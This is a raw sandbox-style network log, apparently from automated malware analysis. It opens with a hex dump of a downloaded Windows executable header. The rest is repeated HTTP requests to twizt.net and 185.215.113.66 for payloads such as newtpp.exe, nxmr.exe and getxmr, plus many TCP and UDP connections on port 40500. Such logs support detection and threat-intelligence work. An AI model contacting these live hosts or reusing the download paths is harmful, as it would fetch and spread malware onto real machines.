00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:35:38 GMTContent-Type: application/octet-streamContent-Length: 5689344Last-Modified: Mon, 17 Apr 2023 13:09:18 GMTConnection: keep-aliveETag: "643d44fe-56d000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 9b d1 3d 64 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 26 00 92 01 00 00 cc 56 00 00 1c 00 00 b0 14 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 60 57 00 00 04 00 00 65 01 57 00 02 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 10 57 00 34 0a 00 00 00 40 57 00 80 03 00 00 00 c0 56 00 4c 11 00 00 00 00 00 00 00 00 00 00 00 50 57 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 a6 56 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8c 12 57 00 50 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a0 90 01 00 00 10 00 00 00 92 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 2e 64 61 74 61 00 00 00 a0 c4 54 00 00 b0 01 00 00 c6 54 00 00 96 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 00 00 50 39 00 00 00 80 56 00 00 3a 00 00 00 5c 56 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 70 64 61 74 61 00 00 4c 11 00 00 00 c0 56 00 00 12 00 00 00 96 56 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 78 64 61 74 61 00 00 f0 0e 00 00 00 e0 56 00 00 10 00 00 00 a8 56 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 62 73 73 00 00 00 00 80 1b 00 00 00 f0 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 69 64 61 74 61 00 00 34 0a 00 00 00 10 57 00 00 0c 00 00 00 b8 56 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 43 52 54 00 00 00 00 60 00 00 00 00 20 57 00 00 02 00 00 00 c4 56 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 30 57 00 00 02 00 00 00 c6 56 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 80 03 00 00 00 40 57 00 00 04 00 00 00 c8 56 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 30 03 00 00 00 50 57 00 00 04 00 00 00 cc 56 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: GET /newtpp.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Host: twizt.net
                            Source: global trafficHTTP traffic detected: GET /peinstall.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: twizt.net
                            Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36Host: icanhazip.com
                            Source: global trafficHTTP traffic detected: GET /from/n.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /from/706.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66If-Modified-Since: Thu, 17 Aug 2023 12:32:50 GMTIf-None-Match: "64de1372-4700"
                            Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66If-Modified-Since: Thu, 17 Aug 2023 12:32:50 GMTIf-None-Match: "64de1372-4700"
                            Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66If-Modified-Since: Thu, 17 Aug 2023 12:32:50 GMTIf-None-Match: "64de1372-4700"
                            Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /getxmr HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /nxmr.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.200.240.149:40500
                            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 87.255.212.22:40500
                            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 195.158.22.13:40500
                            Source: global trafficTCP traffic: 192.168.2.22:49833 -> 2.180.17.238:40500
                            Source: global trafficTCP traffic: 192.168.2.22:50114 -> 87.241.129.126:40500
                            Source: global trafficTCP traffic: 192.168.2.22:63659 -> 82.137.250.24:40500
                            Source: global trafficTCP traffic: 192.168.2.22:63961 -> 134.35.37.154:40500
                            Source: global trafficTCP traffic: 192.168.2.22:64246 -> 45.229.130.166:40500
                            Source: global trafficTCP traffic: 192.168.2.22:60993 -> 1.34.58.190:40500
                            Source: global trafficTCP traffic: 192.168.2.22:52058 -> 59.91.192.116:40500
                            Source: global trafficTCP traffic: 192.168.2.22:59041 -> 89.38.196.114:40500
                            Source: global trafficUDP traffic: 192.168.2.22:54823 -> 59.91.192.117:40500
                            Source: global trafficUDP traffic: 192.168.2.22:54823 -> 185.177.0.201:40500
                            Source: global trafficUDP traffic: 192.168.2.22:54823 -> 2.185.229.68:40500
                            Source: global trafficUDP traffic: 192.168.2.22:54823 -> 2.180.17.91:40500
                            Source: global trafficUDP traffic: 192.168.2.22:54823 -> 62.212.36.229:40500
                            Source: global trafficUDP traffic: 192.168.2.22:54823 -> 178.236.111.156:40500
                            Source: global trafficUDP traffic: 192.168.2.22:54823 -> 2.176.69.250:40500
                            Source: global trafficUDP traffic: 192.168.2.22:54823 -> 2.180.154.243:40500
                            Source: global trafficUDP traffic: 192.168.2.22:54823 -> 182.177.175.241:40500
                            Source: global trafficUDP traffic: 192.168.2.22:54823 -> 91.98.7.42:40500
